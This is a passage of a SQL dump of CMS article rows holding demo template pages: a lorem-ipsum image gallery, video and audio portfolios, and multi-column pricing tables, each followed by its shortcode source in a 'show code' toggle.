/></a></p>\r\n[/column]\r\n[/grid]\r\n\r\n[grid]\r\n[column size=\"1-5\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/6_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_5/6.jpg\" alt=\"gallery\" width=\"213\" height=\"140\" /></a></p>\r\n[/column]\r\n[column size=\"1-5\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/7_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_5/7.jpg\" alt=\"gallery\" width=\"213\" height=\"140\" /></a></p>\r\n[/column]\r\n[column size=\"1-5\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/8_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_5/8.jpg\" alt=\"gallery\" width=\"213\" height=\"140\" /></a></p>\r\n[/column]\r\n[column size=\"1-5\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/9_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_5/9.jpg\" alt=\"gallery\" width=\"213\" height=\"140\" /></a></p>\r\n[/column]\r\n[column size=\"1-5\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/10_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_5/10.jpg\" alt=\"gallery\" width=\"213\" height=\"140\" /></a></p>\r\n[/column]\r\n[/grid]\r\n<hr class=\"divide\" />\r\n\r\n[toggle state=\"closed code\" title=\"show code\"]\r\n\r\n<i>[</i>grid]\r\n<i>[</i>column size=\"1-5\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/1_big.jpg\" title=\"your caption here\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"213\" height=\"140\" src=\"images/demo/gallery/column_5/1.jpg\" alt=\"gallery\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column] \r\n\r\n<i>[</i>column size=\"1-5\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/2_big.jpg\" title=\"your caption here\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"213\" height=\"140\" src=\"images/demo/gallery/column_5/2.jpg\" alt=\"gallery\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>column size=\"1-5\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/3_big.jpg\" title=\"your caption here\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"213\" height=\"140\" src=\"images/demo/gallery/column_5/3.jpg\" alt=\"gallery\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>column size=\"1-5\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/4_big.jpg\" title=\"your caption here\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"213\" height=\"140\" src=\"images/demo/gallery/column_5/4.jpg\" alt=\"gallery\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>column size=\"1-5\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/5_big.jpg\" title=\"your caption here\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"213\" height=\"140\" src=\"images/demo/gallery/column_5/5.jpg\" alt=\"gallery\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>/grid]\r\n\r\n[/toggle]', '', 1, 19, '2012-04-03 06:50:13', 196, '', '2014-07-26 09:18:17', 42, 0, '0000-00-00 00:00:00', '2012-04-03 06:50:13', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 7, 7, '', '', 1, 1371, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', '');
INSERT INTO `y57u5_content` (`id`, `asset_id`, `title`, `alias`, `introtext`, `fulltext`, `state`, `catid`, `created`, `created_by`, `created_by_alias`, `modified`, `modified_by`, `checked_out`, `checked_out_time`, `publish_up`, `publish_down`, `images`, `urls`, `attribs`, `version`, `ordering`, `metakey`, `metadesc`, `access`, `hits`, `metadata`, `featured`, `language`, `xreference`, `note`) VALUES
(45, 100, 'Video Portfolio', 'video-portfolio', '[grid]\r\n[column size=\"1-2\"]\r\n<h3>Be kind whenever possible</h3>\r\n[video width=\"600\" height=\"294\" poster=\"images/demo/video/movie_bg.png\"]\r\n   [source type=\"video/mp4\" url=\"images/demo/video/envato_sting.mp4\"][/source]\r\n   [source type=\"video/ogg\" url=\"images/demo/video/envato_sting.ogv\"][/source]\r\n   [source type=\"video/webm\" url=\"images/demo/video/envato_sting.webm\"][/source]\r\n[/video]\r\n[/column]\r\n[column size=\"1-2\"]\r\n<h3>Make that idea your life</h3>\r\n[video width=\"600\" height=\"294\" poster=\"images/demo/video/movie_bg.png\"]\r\n   [source type=\"video/mp4\" url=\"images/demo/video/envato_sting.mp4\"][/source]\r\n   [source type=\"video/ogg\" url=\"images/demo/video/envato_sting.ogv\"][/source]\r\n   [source type=\"video/webm\" url=\"images/demo/video/envato_sting.webm\"][/source]\r\n[/video][/column]\r\n\r\n[column size=\"1-2\"]\r\n<h3>Inspiration comes from within</h3>\r\n[video width=\"600\" height=\"294\" poster=\"images/demo/video/movie_bg.png\"]\r\n   [source type=\"video/mp4\" url=\"images/demo/video/envato_sting.mp4\"][/source]\r\n   [source type=\"video/ogg\" url=\"images/demo/video/envato_sting.ogv\"][/source]\r\n   [source type=\"video/webm\" url=\"images/demo/video/envato_sting.webm\"][/source]\r\n[/video]\r\n[/column]\r\n[column size=\"1-2\"]\r\n<h3>Videohive comes to life</h3>\r\n[video width=\"600\" height=\"294\" poster=\"images/demo/video/movie_bg.png\"]\r\n   [source type=\"video/mp4\" url=\"images/demo/video/envato_sting.mp4\"][/source]\r\n   [source type=\"video/ogg\" url=\"images/demo/video/envato_sting.ogv\"][/source]\r\n   [source type=\"video/webm\" url=\"images/demo/video/envato_sting.webm\"][/source]\r\n[/video][/column]\r\n[/grid]\r\n\r\n[toggle state=\"closed code\" title=\"show code\"]\r\n\r\n<i>[</i>grid]\r\n<i>[</i>column size=\"1-2\"]\r\n&lt;h3&gt;Be kind whenever possible&lt;/h3&gt;\r\n<i>[</i>video width=\"600\" height=\"294\" poster=\"images/demo/video/movie_bg.png\"]\r\n   <i>[</i>source type=\"video/mp4\" url=\"images/demo/video/envato_sting.mp4\"]<i>[</i>/source]\r\n   <i>[</i>source type=\"video/ogg\" url=\"images/demo/video/envato_sting.ogv\"]<i>[</i>/source]\r\n   <i>[</i>source type=\"video/webm\" url=\"images/demo/video/envato_sting.webm\"]<i>[</i>/source]\r\n<i>[</i>/video]\r\n<i>[</i>/column]\r\n<i>[</i>column size=\"1-2\"]\r\n&lt;h3&gt;Make that idea your life&lt;/h3&gt;\r\n<i>[</i>video width=\"600\" height=\"294\" poster=\"images/demo/video/movie_bg.png\"]\r\n   <i>[</i>source type=\"video/mp4\" url=\"images/demo/video/envato_sting.mp4\"]<i>[</i>/source]\r\n   <i>[</i>source type=\"video/ogg\" url=\"images/demo/video/envato_sting.ogv\"]<i>[</i>/source]\r\n   <i>[</i>source type=\"video/webm\" url=\"images/demo/video/envato_sting.webm\"]<i>[</i>/source]\r\n<i>[</i>/video]<i>[</i>/column]\r\n<i>[</i>/grid]\r\n\r\n[/toggle]', '', 1, 19, '2012-04-03 06:50:13', 196, '', '2014-07-26 09:26:32', 42, 0, '0000-00-00 00:00:00', '2012-04-03 06:50:13', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 29, 4, '', '', 1, 3454, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(46, 101, 'Audio Portfolio', 'audio-portfolio', '[grid]\r\n[column size=\"1-2\"]\r\n<h3>You make me smile by Depard</h3>\r\n[audio src=\"images/demo/audio/sample.mp3\" type=\"audio/mpeg\"][/audio]\r\n<p>Believe that life is worth living and your belief will help create the fact. We help your ideas come to life.</p>\r\n[/column]\r\n[column size=\"1-2\"]\r\n<h3>You make me smile by Depard</h3>\r\n[audio src=\"images/demo/audio/sample.mp3\" type=\"audio/mpeg\"][/audio]\r\n<p>Believe that life is worth living and your belief will help create the fact. We help your ideas come to life.</p>\r\n[/column]\r\n\r\n[column size=\"1-2\"]\r\n<h3>You make me smile by Depard</h3>\r\n[audio src=\"images/demo/audio/sample.mp3\" type=\"audio/mpeg\"][/audio]\r\n<p>Believe that life is worth living and your belief will help create the fact. We help your ideas come to life.</p>\r\n[/column]\r\n[column size=\"1-2\"]\r\n<h3>You make me smile by Depard</h3>\r\n[audio src=\"images/demo/audio/sample.mp3\" type=\"audio/mpeg\"][/audio]\r\n<p>Believe that life is worth living and your belief will help create the fact. We help your ideas come to life.</p>\r\n[/column]\r\n\r\n[column size=\"1-2\"]\r\n<h3>You make me smile by Depard</h3>\r\n[audio src=\"images/demo/audio/sample.mp3\" type=\"audio/mpeg\"][/audio]\r\n<p>Believe that life is worth living and your belief will help create the fact. We help your ideas come to life.</p>\r\n[/column]\r\n[column size=\"1-2\"]\r\n<h3>You make me smile by Depard</h3>\r\n[audio src=\"images/demo/audio/sample.mp3\" type=\"audio/mpeg\"][/audio]\r\n<p>Believe that life is worth living and your belief will help create the fact. We help your ideas come to life.</p>\r\n[/column]\r\n[/grid]\r\n\r\n<hr class=\"divide\" />\r\n\r\n[toggle state=\"closed code\" title=\"show code\"]\r\n\r\n<i>[</i>grid]\r\n<i>[</i>column size=\"1-2\"]\r\n&lt;h3&gt;You make me smile by Depard&lt;/h3&gt;\r\n<i>[</i>audio src=\"images/demo/audio/sample.mp3\" type=\"audio/mpeg\"]<i>[</i>/audio]\r\n&lt;p&gt;Believe that life is worth living and your belief will help create the fact. We help your ideas come to life.&lt;/p&gt;\r\n<i>[</i>/column]\r\n<i>[</i>column size=\"1-2\"]\r\n&lt;h3&gt;You make me smile by Depard&lt;/h3&gt;\r\n<i>[</i>audio src=\"images/demo/audio/sample.mp3\" type=\"audio/mpeg\"]<i>[</i>/audio]\r\n&lt;p&gt;Believe that life is worth living and your belief will help create the fact. We help your ideas come to life.&lt;/p&gt;\r\n<i>[</i>/column]\r\n<i>[</i>/grid]\r\n\r\n[/toggle]', '', 1, 2, '2012-04-03 06:50:13', 196, '', '2015-06-03 06:34:41', 42, 0, '0000-00-00 00:00:00', '2012-04-03 06:50:13', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 21, 14, '', '', 1, 794, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(61, 127, 'Pricing Tables', 'pricing-tables', '<h3 class=\"dotted\">Two Column Pricing</h3>\r\n[pricing columns=\"two\"]\r\n[price-col table-config=\"first\" table-caption=\"<strong>Standard</strong> Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$7[sub]/mo[/sub][/price-tag][li]24/5 Support[/li][li]3 months Renewal[/li][li]1 User Licence[/li][li]No Contracts[/li][li]1 Domain[/li][/price-col]\r\n[price-col table-config=\"last\" table-caption=\"<strong>Developer</strong> Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$20[sub]/mo[/sub][/price-tag][li]24/7 Support[/li][li]7 months Renewal[/li][li]5 User Licences[/li][li]No Contracts[/li][li]5 Domain[/li][/price-col]\r\n[/pricing]\r\n\r\n[toggle state=\"code\" title=\"show code\"]<i>[</i>pricing columns=\"two\"]\r\n\r\n<i>[</i>price-col table-config=\"first\" table-caption=\"Standard Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$7<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/5 Support<i>[</i>/li]\r\n<i>[</i>li]3 months Renewal<i>[</i>/li]\r\n<i>[</i>li]1 User Licence<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]1 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"last\" table-caption=\"Developer Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$20<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/7 Support<i>[</i>/li]\r\n<i>[</i>li]7 months Renewal<i>[</i>/li]\r\n<i>[</i>li]5 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]5 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>/pricing][/toggle]\r\n  \r\n<hr class=\"divide\" />\r\n<h3 class=\"dotted\">Three Column Pricing</h3>\r\n[pricing columns=\"three\"]\r\n[price-col table-config=\"first\" table-caption=\"<strong>Standard</strong> Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$7[sub]/mo[/sub][/price-tag][li]24/5 Support[/li][li]3 months Renewal[/li][li]1 User Licence[/li][li]No Contracts[/li][li]1 Domain[/li][/price-col]\r\n[price-col table-config=\"\" table-caption=\"<strong>Professional</strong> Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$15[sub]/mo[/sub][/price-tag][li]24/6 Support[/li][li]5 months Renewal[/li][li]3 User Licences[/li][li]No Contracts[/li][li]3 Domain[/li][/price-col]\r\n[price-col table-config=\"last\" table-caption=\"<strong>Developer</strong> Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$20[sub]/mo[/sub][/price-tag][li]24/7 Support[/li][li]7 months Renewal[/li][li]5 User Licences[/li][li]No Contracts[/li][li]5 Domain[/li][/price-col]\r\n[/pricing]\r\n\r\n[toggle state=\"code\" title=\"show code\"]<i>[</i>pricing columns=\"three\"]\r\n\r\n<i>[</i>price-col table-config=\"first\" table-caption=\"Standard Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$7<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/5 Support<i>[</i>/li]\r\n<i>[</i>li]3 months Renewal<i>[</i>/li]\r\n<i>[</i>li]1 User Licence<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]1 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"\" table-caption=\"Professional Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$15<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/6 Support<i>[</i>/li]\r\n<i>[</i>li]5 months Renewal<i>[</i>/li]\r\n<i>[</i>li]3 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]3 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"last\" table-caption=\"Developer Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$20<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/7 Support<i>[</i>/li]\r\n<i>[</i>li]7 months Renewal<i>[</i>/li]\r\n<i>[</i>li]5 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]5 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>/pricing][/toggle]\r\n  \r\n<hr class=\"divide\" />\r\n<h3 class=\"dotted\">Four Column Pricing</h3>\r\n[pricing columns=\"four\"]\r\n[price-col table-config=\"first\" table-caption=\"<strong>Standard</strong> Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$7[sub]/mo[/sub][/price-tag][li]24/5 Support[/li][li]3 months Renewal[/li][li]1 User Licence[/li][li]No Contracts[/li][li]1 Domain[/li][/price-col]\r\n[price-col table-config=\"\" table-caption=\"<strong>Professional</strong> Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$15[sub]/mo[/sub][/price-tag][li]24/6 Support[/li][li]5 months Renewal[/li][li]3 User Licences[/li][li]No Contracts[/li][li]3 Domain[/li][/price-col]\r\n[price-col table-config=\"focus\" table-caption=\"<strong>Enterprise </strong>Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$20[sub]/mo[/sub][/price-tag][li]24/6 Support[/li][li]7 months Renewal[/li][li]3 User Licences[/li][li]No Contracts[/li][li]3 Domain[/li][/price-col]\r\n[price-col table-config=\"last\" table-caption=\"<strong>Developer</strong> Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$25[sub]/mo[/sub][/price-tag][li]24/7 Support[/li][li]10 months Renewal[/li][li]10 User Licences[/li][li]No Contracts[/li][li]5 Domain[/li][/price-col]\r\n[/pricing]\r\n\r\n[toggle state=\"code\" title=\"show code\"]<i>[</i>pricing columns=\"four\"]\r\n\r\n<i>[</i>price-col table-config=\"first\" table-caption=\"Standard Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$7<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/5 Support<i>[</i>/li]\r\n<i>[</i>li]3 months Renewal<i>[</i>/li]\r\n<i>[</i>li]1 User Licence<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]1 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"\" table-caption=\"Professional Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$15<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/6 Support<i>[</i>/li]\r\n<i>[</i>li]5 months Renewal<i>[</i>/li]\r\n<i>[</i>li]3 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]3 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"\" table-caption=\"Professional Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$15<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/6 Support<i>[</i>/li]\r\n<i>[</i>li]5 months Renewal<i>[</i>/li]\r\n<i>[</i>li]3 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]3 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"last\" table-caption=\"Developer Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$20<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/7 Support<i>[</i>/li]\r\n<i>[</i>li]7 months Renewal<i>[</i>/li]\r\n<i>[</i>li]5 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]5 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>/pricing][/toggle]\r\n\r\n<hr class=\"divide\" />\r\n<h3 class=\"dotted\">Five Column Pricing</h3>\r\n[pricing columns=\"five\"]\r\n[price-col table-config=\"first\" table-caption=\"<strong>Standard</strong> Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$7[sub]/mo[/sub][/price-tag][li]24/5 Support[/li][li]3 months Renewal[/li][li]1 User Licence[/li][li]No Contracts[/li][li]1 Domain[/li][/price-col]\r\n[price-col table-config=\"\" table-caption=\"<strong>Professional</strong> Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$15[sub]/mo[/sub][/price-tag][li]24/6 Support[/li][li]5 months Renewal[/li][li]3 User Licences[/li][li]No Contracts[/li][li]3 Domain[/li][/price-col]\r\n[price-col table-config=\"focus\" table-caption=\"<strong>Enterprise </strong>Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$20[sub]/mo[/sub][/price-tag][li]24/6 Support[/li][li]7 months Renewal[/li][li]3 User Licences[/li][li]No Contracts[/li][li]5 Domain[/li][/price-col]\r\n[price-col table-config=\"\" table-caption=\"<strong>Lifetime </strong>Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$30[sub]/mo[/sub][/price-tag][li]24/6 Support[/li][li]8 months Renewal[/li][li]5 User Licences[/li][li]No Contracts[/li][li]7 Domain[/li][/price-col]\r\n[price-col table-config=\"last\" table-caption=\"<strong>Developer</strong> Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$35[sub]/mo[/sub][/price-tag][li]24/7 Support[/li][li]10 months Renewal[/li][li]10 User Licences[/li][li]No Contracts[/li][li]10 Domain[/li][/price-col]\r\n[/pricing]\r\n[toggle state=\"code\" title=\"show code\"]<i>[</i>pricing columns=\"five\"]\r\n\r\n<i>[</i>price-col table-config=\"first\" table-caption=\"Standard Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$7<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/5 Support<i>[</i>/li]\r\n<i>[</i>li]3 months Renewal<i>[</i>/li]\r\n<i>[</i>li]1 User Licence<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]1 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"\" table-caption=\"Professional Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$15<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/6 Support<i>[</i>/li]\r\n<i>[</i>li]5 months Renewal<i>[</i>/li]\r\n<i>[</i>li]3 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]3 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"\" table-caption=\"Professional Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$15<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/6 Support<i>[</i>/li]\r\n<i>[</i>li]5 months Renewal<i>[</i>/li]\r\n<i>[</i>li]3 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]3 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"\" table-caption=\"Professional Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$15<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/6 Support<i>[</i>/li]\r\n<i>[</i>li]5 months Renewal<i>[</i>/li]\r\n<i>[</i>li]3 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]3 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"last\" table-caption=\"Developer Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$20<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/7 Support<i>[</i>/li]\r\n<i>[</i>li]7 months Renewal<i>[</i>/li]\r\n<i>[</i>li]5 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]5 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>/pricing][/toggle]\r\n\r\n<hr class=\"divide\" />\r\n<h3 class=\"dotted\">Six Column Pricing</h3>\r\n[pricing columns=\"six\"]\r\n[price-col table-config=\"first\" table-caption=\"<strong>Standard</strong>\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$7[sub]/mo[/sub][/price-tag][li]24/5 Support[/li][li]3 months Renewal[/li][li]1 User Licence[/li][li]No Contracts[/li][li]1 Domain[/li][/price-col]\r\n[price-col table-config=\"\" table-caption=\"<strong>Professional</strong>\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$15[sub]/mo[/sub][/price-tag][li]24/6 Support[/li][li]5 months Renewal[/li][li]3 User Licences[/li][li]No Contracts[/li][li]3 Domain[/li][/price-col]\r\n[price-col table-config=\"\" table-caption=\"<strong>Enterprise</strong>\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$20[sub]/mo[/sub][/price-tag][li]24/6 Support[/li][li]7 months Renewal[/li][li]3 User Licences[/li][li]No Contracts[/li][li]5 Domain[/li][/price-col]\r\n[price-col table-config=\"\" table-caption=\"<strong>Lifetime</strong>\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$30[sub]/mo[/sub][/price-tag][li]24/6 Support[/li][li]8 months Renewal[/li][li]5 User Licences[/li][li]No Contracts[/li][li]7 Domain[/li][/price-col]\r\n[price-col 